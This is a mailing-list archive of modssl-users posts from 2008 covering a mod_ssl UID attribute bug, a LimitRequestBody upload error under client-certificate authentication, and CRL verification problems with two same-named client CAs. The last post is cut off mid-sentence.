Message-ID: <4841315A.7070900@stroeder.com>
Date: Sat, 31 May 2008 13:07:06 +0200
From: =?UTF-8?B?TWljaGFlbCBTdHLDtmRlcg==?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080313 SeaMonkey/1.1.9
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Extracting SSL_CLIENT_S_DN_UID does not work
References: <483136B9.5020408@stroeder.com> <20080523094229.GA15459@redhat.com> <4836D8D8.4030500@stroeder.com> <20080523150226.GC31834@redhat.com> <4836E176.6050301@stroeder.com> <20080523233942.GA22962@redhat.com> <4837C15B.6050704@stroeder.com>
In-Reply-To: <4837C15B.6050704@stroeder.com>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?UTF-8?B?TWljaGFlbCBTdHLDtmRlcg==?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Michael Ströder wrote:
> Joe Orton wrote:
>> On Fri, May 23, 2008 at 05:23:34PM +0200, Michael Ströder wrote:
>>> Ok, then the OID in my cert is 0.9.2342.19200300.100.1.1 (attribute 
>>> type 'uid' specified for pilotPerson). That seems right to me since 
>>> it's compliant with RFC 4514 which contains a table of short and long 
>>> attribute type names and their OIDs (end of chapter 3).
>>>
>>> But now I don't understand the #ifdef-statement mentioned above. From 
>>> my understanding it MUST NOT reference NID_x500UniqueIdentifier. It 
>>> MUST reference NID_userId. To me that looks clearly like a bug in 
>>> mod_ssl.
>>
>> Changing it would break backwards-compat which is why the #ifdef is 
>> there (so that the _UID variable refers to the same OID regardless of 
>> what OpenSSL version si use).
> 
> 1. I seriously doubt that there are any certs out there which use 
> x500UniqueIdentifier in the subject-DN. If yes, then these certs are 
> also seriously broken.
> 
> 2. It's simply broken that attribute type UID in mod_ssl differs from 
> OpenSSL here.

Please take note of this Apache issue and consider the patch attached:

https://issues.apache.org/bugzilla/show_bug.cgi?id=45107

Ciao, Michael.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  5 18:47:57 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EB58614D885; Thu,  5 Jun 2008 18:47:56 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from rs40.luxsci.com (rs40.luxsci.com [65.61.166.82])
	by master.modssl.org (Postfix) with ESMTP id CA83614D858
	for ; Thu,  5 Jun 2008 18:47:55 +0200 (CEST)
Received: from doberman.l.localdomain (65-100-165-185.hlrn.qwest.net [65.100.165.185])
	(authenticated bits=0)
	by rs40.luxsci.com (8.13.1/8.13.7) with ESMTP id m55GlPSA029328
	(version=TLSv1/SSLv3 cipher=AES256-SHA bits=256 verify=NOT)
	for ; Thu, 5 Jun 2008 11:47:26 -0500
Received: from khellman by doberman.l.localdomain with local (Exim 4.69)
	(envelope-from )
	id 1K4IcX-000838-4D
	for modssl-users@modssl.org; Thu, 05 Jun 2008 10:47:25 -0600
Date: Thu, 5 Jun 2008 10:47:25 -0600
From: Keith Hellman 
To: modssl-users List 
Subject: LimitRequestBody 0
Message-ID: <20080605164725.GA30779@doberman.l.localdomain>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="WIyZ46R2i8wDzkSu"
Content-Disposition: inline
Jabber-ID: jabber@mcprogramming.com
User-Agent: Mutt/1.5.17+20080114 (2008-01-14)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Keith Hellman 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--WIyZ46R2i8wDzkSu
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

This sounds a lot like=20
  https://issues.apache.org/bugzilla/show_bug.cgi?id=3D42625
  https://issues.apache.org/bugzilla/show_bug.cgi?id=3D12355

But I think it is different.  I'm using certificates for authentication
to all of my pages:


	# applied to _all_ URLs
	SSLRequireSSL

	SSLVerifyClient      require
	SSLVerifyDepth       5
	SSLCACertificateFile /root/openssl/doberman-ca.crt
	SSLOptions           +FakeBasicAuth
	SSLRequire           %{SSL_CLIENT_S_DN_O} eq "mcprogramming.com" and \
	                     %{SSL_CLIENT_S_DN_OU} in {"doberman", "localhost"}


When I try to upload an image to my wiki (MoinMoin, 1.70rc2) I get=20
a 413:
 Request Entity Too Large
 The requested resource
 /m17test/MyStartingPage
 does not allow request data with POST requests, or the amount of data
 provided in the request exceeds the capacity limit.
 Apache/2.2.8 (Debian) mod_ssl/2.2.8 OpenSSL/0.9.8g mod_wsgi/2.0
 Python/2.5.2 Server at localhost Port 443

I can add
 LimitRequestBody 2147483647
to conf and  things work splendidly, but if I use
 LimitRequestBody 0
(which should allow unlimited upload sizes),  I'm back to the error
messages above.

Any thoughts?  All the version info is in the error message, this is on
a debian testing system.

TIA
--=20
Keith Hellman                             #include 
khellman@mcprogramming.com                from disclaimer import standard
khellman@mines.edu
                                   -*-                                   =
=20
                    public key @ pgp.mit.edu 9FCF40FD=20
    Y!M: mcprogramming                           AIM/ICQ: 485403897      =
=20
                     gtalk: jabber@mcprogramming.com                     =
=20
                                   -*-                                   =
=20

"The First Python function ever written (takes place in the Garden of Eden)"

Guido sayeth "I will write def foo():"
"Hmm, I could use an import, or two",
Satan said, in a whirl, "Why not write it in Perl?",
and the second function ever written -  def foo_you():=20

-- Python Limmerick Contest submission by cappy2112
   http://groups-beta.google.com/group/comp.lang.python/browse_thread/threa=
d/d7a780beaff2e88a/

--WIyZ46R2i8wDzkSu
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFISBiceAsFcZ/PQP0RAoXDAKCppHaksWfZ960Qpe0JPXxadjIbrgCfbsWD
uNGEMYg63ivMGcu5APQe0DQ=
=YZSv
-----END PGP SIGNATURE-----

--WIyZ46R2i8wDzkSu--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  5 19:06:23 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D3A5C14D885; Thu,  5 Jun 2008 19:06:23 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from rs40.luxsci.com (rs40.luxsci.com [65.61.166.82])
	by master.modssl.org (Postfix) with ESMTP id C3E3D14D858
	for ; Thu,  5 Jun 2008 19:06:22 +0200 (CEST)
Received: from doberman.l.localdomain (65-100-165-185.hlrn.qwest.net [65.100.165.185])
	(authenticated bits=0)
	by rs40.luxsci.com (8.13.1/8.13.7) with ESMTP id m55H5q1k027613
	(version=TLSv1/SSLv3 cipher=AES256-SHA bits=256 verify=NOT)
	for ; Thu, 5 Jun 2008 12:05:53 -0500
Received: from khellman by doberman.l.localdomain with local (Exim 4.69)
	(envelope-from )
	id 1K4IuO-0008AK-1w
	for modssl-users@modssl.org; Thu, 05 Jun 2008 11:05:52 -0600
Date: Thu, 5 Jun 2008 11:05:52 -0600
From: Keith Hellman 
To: modssl-users List 
Subject: Re: LimitRequestBody 0
Message-ID: <20080605170552.GB30779@doberman.l.localdomain>
References: <20080605164725.GA30779@doberman.l.localdomain>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="rJwd6BRFiFCcLxzm"
Content-Disposition: inline
In-Reply-To: <20080605164725.GA30779@doberman.l.localdomain>
Jabber-ID: jabber@mcprogramming.com
User-Agent: Mutt/1.5.17+20080114 (2008-01-14)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Keith Hellman 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--rJwd6BRFiFCcLxzm
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Oh yeah, I forgot to mention: everything works AOK if I try using http
instead (hence, I'm posting on the modssl list).
--=20
Keith Hellman                             #include 
khellman@mcprogramming.com                from disclaimer import standard
khellman@mines.edu
                                   -*-                                   =
=20
                    public key @ pgp.mit.edu 9FCF40FD=20
    Y!M: mcprogramming                           AIM/ICQ: 485403897      =
=20
                     gtalk: jabber@mcprogramming.com                     =
=20
                                   -*-                                   =
=20

"We will perhaps eventually be writing only small modules which are identif=
ied
by name as they are used to build larger ones, so that devices like
indentation, rather than delimiters, might become feasible for expressing l=
ocal
structure in the source language."

-- Donald E. Knuth, "Structured Programming with goto Statements", Computing
Surveys, Vol 6 No 4, Dec. 1974

--rJwd6BRFiFCcLxzm
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFISBzweAsFcZ/PQP0RAjPnAJ96frSoUxSBD+75UTJGXEmzXhjB/wCgsfnS
X/gWaif8SgCIRCZxuFGXZsw=
=/1N6
-----END PGP SIGNATURE-----

--rJwd6BRFiFCcLxzm--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  6 09:41:16 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BC3B714DA2E; Fri,  6 Jun 2008 09:41:16 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id E458614D82F
	for ; Fri,  6 Jun 2008 09:41:15 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id m567ej1L012415;
	Fri, 6 Jun 2008 03:40:45 -0400
Received: from turnip.manyfish.co.uk (IDENT:U2FsdGVkX198SRs5bgNkQ1GVVJ0+8JSF9RDBKsYJ4D4@vpn-14-89.rdu.redhat.com [10.11.14.89])
	by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id m567eiDJ011839;
	Fri, 6 Jun 2008 03:40:45 -0400
Received: from jorton by turnip.manyfish.co.uk with local (Exim 4.68)
	(envelope-from )
	id 1K4WZ2-0001L3-6W; Fri, 06 Jun 2008 08:40:44 +0100
Date: Fri, 6 Jun 2008 08:40:44 +0100
From: Joe Orton 
To: Keith Hellman 
Cc: modssl-users List 
Subject: Re: LimitRequestBody 0
Message-ID: <20080606074044.GA4019@redhat.com>
Mail-Followup-To: Keith Hellman ,
	modssl-users List 
References: <20080605164725.GA30779@doberman.l.localdomain>
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <20080605164725.GA30779@doberman.l.localdomain>
User-Agent: Mutt/1.5.17 (2007-11-01)
Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom.
  Registered in UK and Wales under Company Registration No. 03798903
  Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA)
X-Scanned-By: MIMEDefang 2.58 on 172.16.52.254
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Jun 05, 2008 at 10:47:25AM -0600, Keith Hellman wrote:
> This sounds a lot like 
>   https://issues.apache.org/bugzilla/show_bug.cgi?id=42625
>   https://issues.apache.org/bugzilla/show_bug.cgi?id=12355
> 
> But I think it is different.  I'm using certificates for authentication
> to all of my pages:
> 
> 
> 	# applied to _all_ URLs
> 	SSLRequireSSL
> 
> 	SSLVerifyClient      require

You should put all this inside the VirtualHost config for the SSL 
vhost(s) in question.  That way you avoid having to do a per-location 
renegotiation and the request body buffering which is necessary in that 
case.

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 16 16:14:54 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D539414DA41; Mon, 16 Jun 2008 16:14:54 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from py-out-1112.google.com (py-out-1112.google.com [64.233.166.176])
	by master.modssl.org (Postfix) with ESMTP id 8B85E14D865
	for ; Mon, 16 Jun 2008 16:14:44 +0200 (CEST)
Received: by py-out-1112.google.com with SMTP id u77so1682725pyb.12
        for ; Mon, 16 Jun 2008 07:14:04 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to
         :subject:mime-version:content-type:content-transfer-encoding
         :content-disposition;
        bh=Biu46v0sDA35DAex0YxDsdeyF+Of0EWNsaGkPMuAfGM=;
        b=MOTeHUxbWSZU8YSXZYpom6KiXYCISBpmPe66lDmBIPy5UYRQs+lSt8dL6xZDCYrRcd
         pUnxe4LRJT/VGcp455wijkbBbS0rcVf+FhqKFuMHI4becb/XFusAtRhRBWvvqPXz8d4F
         SrrEemOn24APodTqqzf0jLD6YESVxMfgU2M2s=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:mime-version:content-type
         :content-transfer-encoding:content-disposition;
        b=va/CqXD/ckJ4OXp2Y8CYyDKtrkSDS78OC0XZPv1ivPFBED9jQvbk4g+RR7QJknRW0T
         Go/VDLqPzlY98vsJfPR4hzvEAoN8hzhHtcK2S4pUDppKVbkEfE3ip4Pi+ZSPBDnHegYc
         WxBLt6mlhELa4Q6hqLZP26lgFGKOf6lWBc0qk=
Received: by 10.115.78.1 with SMTP id f1mr6200213wal.150.1213625631098;
        Mon, 16 Jun 2008 07:13:51 -0700 (PDT)
Received: by 10.70.18.15 with HTTP; Mon, 16 Jun 2008 07:13:50 -0700 (PDT)
Message-ID: <2e4d6cdc0806160713m37eae252yf22eabd990a98394@mail.gmail.com>
Date: Mon, 16 Jun 2008 16:13:50 +0200
From: "Gilles Cuesta" 
To: modssl-users@modssl.org
Subject: Generic question on CRL use
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Cuesta" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi alls,

new on the list, and not tricky question :D

We use client certs authentication at our office, there is a CA chain
like this :

BigCA (self signed)
IntermediateCA (signed by BigCA)
ServerCert (signed by IntermediateCA) used by Apache/modssl
ClientCA (signed by IntermediateCA)
many clients (signed by ClientCA)

- ClientX have 1 year validity
- ClientCA have 4 years validity, but replaced at half life (2 year)
so ClientX signed by old ClientCA version remain valid until
expiration.
- CRL is signed by recent ClientCA

So, at a time, we have 2 ClientCA with different key and different
validity period, but same DN.

The problem is, when verifying client cert work with both ClientCA
stacked; but when using CRL, old clients work only if CRL is signed by
old ClientCA.

1/ is it rfc compliant, and if not, why (reference ?).
2/ if this is rfc compliant, why does openssl does not handle this ?

Thanks for all help you could provide.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 16 17:15:05 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 14EC814DA41; Mon, 16 Jun 2008 17:15:05 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from srv1.stroeder.com (srv1.stroeder.com [213.240.180.113])
	by master.modssl.org (Postfix) with ESMTP id 9B1E114D865
	for ; Mon, 16 Jun 2008 17:15:03 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by srv1.stroeder.com (Postfix) with ESMTP id 013101C65A1
	for ; Mon, 16 Jun 2008 17:14:33 +0200 (CEST)
X-Virus-Scanned: amavisd-new at stroeder.com
Received: from srv1.stroeder.com ([127.0.0.1])
	by localhost (srv2.stroeder.com [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id eEgLnu0WTZTB for ;
	Mon, 16 Jun 2008 17:13:58 +0200 (CEST)
Received: from [10.1.0.2] (unknown [10.1.0.2])
	by srv1.stroeder.com (Postfix) with ESMTP id 46E091C65A4
	for ; Mon, 16 Jun 2008 17:13:58 +0200 (CEST)
Message-ID: <48568336.4050406@stroeder.com>
Date: Mon, 16 Jun 2008 17:13:58 +0200
From: =?ISO-8859-1?Q?Michael_Str=F6der?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080313 SeaMonkey/1.1.9
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Generic question on CRL use
References: <2e4d6cdc0806160713m37eae252yf22eabd990a98394@mail.gmail.com>
In-Reply-To: <2e4d6cdc0806160713m37eae252yf22eabd990a98394@mail.gmail.com>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Michael_Str=F6der?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Gilles Cuesta wrote:
> So, at a time, we have 2 ClientCA with different key and different
> validity period, but same DN.

This is bad practice. Try searching for "CA key roll-over".

> The problem is, when verifying client cert work with both ClientCA
> stacked; but when using CRL, old clients work only if CRL is signed by
> old ClientCA.

Well, you asked for trouble...

You could try to add the authorityKeyIdentifier extension to the CRL if 
it's also present in the CA certs. This could work with some software.

But my strong recommendation: Fix your 2nd ClientCA cert.

Ciao, Michael.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 16 18:47:30 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C75CE14DA3A; Mon, 16 Jun 2008 18:47:30 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from rv-out-0506.google.com (rv-out-0506.google.com [209.85.198.227])
	by master.modssl.org (Postfix) with ESMTP id 7404E14D865
	for ; Mon, 16 Jun 2008 18:47:28 +0200 (CEST)
Received: by rv-out-0506.google.com with SMTP id k40so3688101rvb.1
        for ; Mon, 16 Jun 2008 09:46:56 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to
         :subject:in-reply-to:mime-version:content-type
         :content-transfer-encoding:content-disposition:references;
        bh=BElBBobVZxnj5jcIJzPeE7Ey+3ksKA6CAncEowdsxEI=;
        b=fqpSUNWAcgqcGWAAbWLb89wDsbMTilLyMbCIKYrL9xTN9mqavffv4Yhhacn1sKp6l6
         uifgUmGnfexTYhwzKjNyiPRNhWWBlRzmlO9LpOGEh5W7VUvngdYZmGD5yAae8l2T7U+Q
         KmKveY9wdg8EpBvcHwW0VtqGlOAI3FiSopMlc=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:in-reply-to:mime-version
         :content-type:content-transfer-encoding:content-disposition
         :references;
        b=Fi/HknwwSex2Z7F+MPzJCBLPILlgdPIW4DLk49k7P9DgHAKtfMxMLjauzU+Pk2APMJ
         nxwy/dNqgGA1jmQr7ek6ldvrzOcy9kVJv8+ImntdVtSOgPz5yu+axkvc6+NUIsVtyPhI
         /N0oj/zmIY2QVrWGGKLQHacsyqaBrvEpJrTTc=
Received: by 10.141.163.12 with SMTP id q12mr3856875rvo.265.1213634816347;
        Mon, 16 Jun 2008 09:46:56 -0700 (PDT)
Received: by 10.70.18.15 with HTTP; Mon, 16 Jun 2008 09:46:56 -0700 (PDT)
Message-ID: <2e4d6cdc0806160946w9c6c63fqa1710ce7c2964e31@mail.gmail.com>
Date: Mon, 16 Jun 2008 18:46:56 +0200
From: "Gilles Cuesta" 
To: modssl-users@modssl.org
Subject: Re: Generic question on CRL use
In-Reply-To: <48568336.4050406@stroeder.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <2e4d6cdc0806160713m37eae252yf22eabd990a98394@mail.gmail.com>
	 <48568336.4050406@stroeder.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Cuesta" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

2008/6/16 Michael Str=F6der :
> Gilles Cuesta wrote:
>>
>> So, at a time, we have 2 ClientCA with different key and different
>> validity period, but same DN.
>
> This is bad practice. Try searching for "CA key roll-over".

I found docs about it, but proprietary PKI, and couldn't know if this
feature is implemented ...

>
>> The problem is, when verifying client cert work with both ClientCA
>> stacked; but when using CRL, old clients work only if CRL is signed by
>> old ClientCA.
>
> Well, you asked for trouble...
>
> You could try to add the authorityKeyIdentifier extension to the CRL if i=
t's
> also present in the CA certs. This could work with some software.
>

Here we are :D

apache.crl
Certificate Revocation List (CRL):
        Version 2 (0x1)
...
            X509v3 Authority Key Identifier:
                keyid:B8:85:B4...

apache-caclient.cer
Certificate:
...
        Validity
            Not Before: Feb 29 12:23:38 2007 GMT
            Not After : Feb 29 12:23:58 2011 GMT
...
            X509v3 Key Usage: critical
                Certificate Sign, CRL Sign
...
            X509v3 Subject Key Identifier:
                B8:85:B4...
            X509v3 Authority Key Identifier:
                keyid:56:4D:A9...

apache-caclient-old.cer
Certificate:
...
        Validity
            Not Before: May 18 14:35:12 2005 GMT
            Not After : May 18 14:35:12 2009 GMT
...
       X509v3 extensions:
           X509v3 Key Usage: critical
               Certificate Sign, CRL Sign
...
           X509v3 Subject Key Identifier:
               87:1D:FC...
          X509v3 Authority Key Identifier:
               keyid:56:4D:A9...

But it doesn't work asis, issuing "signature verification error" in
apache error logs ...

Is there something to be modified in Apache/Modssl conf ?

Thank you
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 16 19:13:47 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2A09D14DA37; Mon, 16 Jun 2008 19:13:47 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from srv1.stroeder.com (srv1.stroeder.com [213.240.180.113])
	by master.modssl.org (Postfix) with ESMTP id B475114D865
	for ; Mon, 16 Jun 2008 19:13:46 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by srv1.stroeder.com (Postfix) with ESMTP id E27FA1C6637
	for ; Mon, 16 Jun 2008 19:13:15 +0200 (CEST)
X-Virus-Scanned: amavisd-new at stroeder.com
Received: from srv1.stroeder.com ([127.0.0.1])
	by localhost (srv2.stroeder.com [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id jHvzbNi8lnbV for ;
	Mon, 16 Jun 2008 19:12:41 +0200 (CEST)
Received: from [10.1.0.2] (unknown [10.1.0.2])
	by srv1.stroeder.com (Postfix) with ESMTP id AEF3B1C6624
	for ; Mon, 16 Jun 2008 19:12:41 +0200 (CEST)
Message-ID: <48569F08.8090702@stroeder.com>
Date: Mon, 16 Jun 2008 19:12:40 +0200
From: =?ISO-8859-1?Q?Michael_Str=F6der?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080313 SeaMonkey/1.1.9
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Generic question on CRL use
References: <2e4d6cdc0806160713m37eae252yf22eabd990a98394@mail.gmail.com>	 <48568336.4050406@stroeder.com> <2e4d6cdc0806160946w9c6c63fqa1710ce7c2964e31@mail.gmail.com>
In-Reply-To: <2e4d6cdc0806160946w9c6c63fqa1710ce7c2964e31@mail.gmail.com>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Michael_Str=F6der?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Gilles Cuesta wrote:
> 2008/6/16 Michael Ströder :
>> Gilles Cuesta wrote:
>>> So, at a time, we have 2 ClientCA with different key and different
>>> validity period, but same DN.
>> This is bad practice. Try searching for "CA key roll-over".
> 
> I found docs about it, but proprietary PKI, and couldn't know if this
> feature is implemented ...

It's not a "feature"! Pretty sure there are docs out there describing 
best practices when conducting a CA key roll-over. One of the best 
practices is to change the subject DN of the CA entity cert.

>> You could try to add the authorityKeyIdentifier extension to the CRL if it's
>> also present in the CA certs. This could work with some software.
>           X509v3 Authority Key Identifier:
>                keyid:56:4D:A9...
> 
> But it doesn't work asis, issuing "signature verification error" in
> apache error logs ...

Glad you learned so soon that it's better to rework your re-newed sub-CA 
cert. ;-)

Ciao, Michael.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 16 21:34:32 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C9CD414DA61; Mon, 16 Jun 2008 21:34:32 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.carillon.ca (mail.carillon.ca [207.115.107.27])
	by master.modssl.org (Postfix) with ESMTP id B86A814D865
	for ; Mon, 16 Jun 2008 21:34:31 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.carillon.ca (Postfix) with ESMTP id 3C0663280A8
	for ; Mon, 16 Jun 2008 15:34:00 -0400 (EDT)
Received: from mail.carillon.ca ([127.0.0.1])
	by localhost (rhea.carillon.ca [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id 9DDrSheEc9AD for ;
	Mon, 16 Jun 2008 15:33:54 -0400 (EDT)
Received: from carillon.dcoombs.ca (69-196-152-118.dsl.teksavvy.com [69.196.152.118])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by mail.carillon.ca (Postfix) with ESMTP id 53D6F3280A6
	for ; Mon, 16 Jun 2008 15:33:54 -0400 (EDT)
From: Patrick Patterson 
Organization: Carillon Information Security Inc.
To: modssl-users@modssl.org
Subject: Re: Generic question on CRL use
Date: Mon, 16 Jun 2008 15:32:17 -0400
User-Agent: KMail/1.9.6 (enterprise 0.20070907.709405)
References: <2e4d6cdc0806160713m37eae252yf22eabd990a98394@mail.gmail.com> <48568336.4050406@stroeder.com> <2e4d6cdc0806160946w9c6c63fqa1710ce7c2964e31@mail.gmail.com>
In-Reply-To: <2e4d6cdc0806160946w9c6c63fqa1710ce7c2964e31@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Message-Id: <200806161532.17436.ppatterson@carillonis.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Patrick Patterson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On June 16, 2008 12:46:56 pm Gilles Cuesta wrote:
> 2008/6/16 Michael Str=F6der :
> > Gilles Cuesta wrote:
> >> So, at a time, we have 2 ClientCA with different key and different
> >> validity period, but same DN.
> >
> > This is bad practice. Try searching for "CA key roll-over".
>
> I found docs about it, but proprietary PKI, and couldn't know if this
> feature is implemented ...
>
Check the IETF PKIX mailing list. There is a thread there by Santosh Chokha=
ni=20
and Stefan Santesson that goes into this. Short answer is - you can do what=
=20
you want, but it's REALLY tricky, and Michael is right - best practice is t=
o=20
version your CA's. (so the current one is CA1, the next one is CA2, etc.)

> >> The problem is, when verifying client cert work with both ClientCA
> >> stacked; but when using CRL, old clients work only if CRL is signed by
> >> old ClientCA.
> >
> > Well, you asked for trouble...
> >
> > You could try to add the authorityKeyIdentifier extension to the CRL if
> > it's also present in the CA certs. This could work with some software.
>
> Here we are :D
>
Ummm I think you mean that you want to have, in the CRL DP in the client=20
certificate, the crlIssuer field of the CRL DP - problem is that 90% of the=
=20
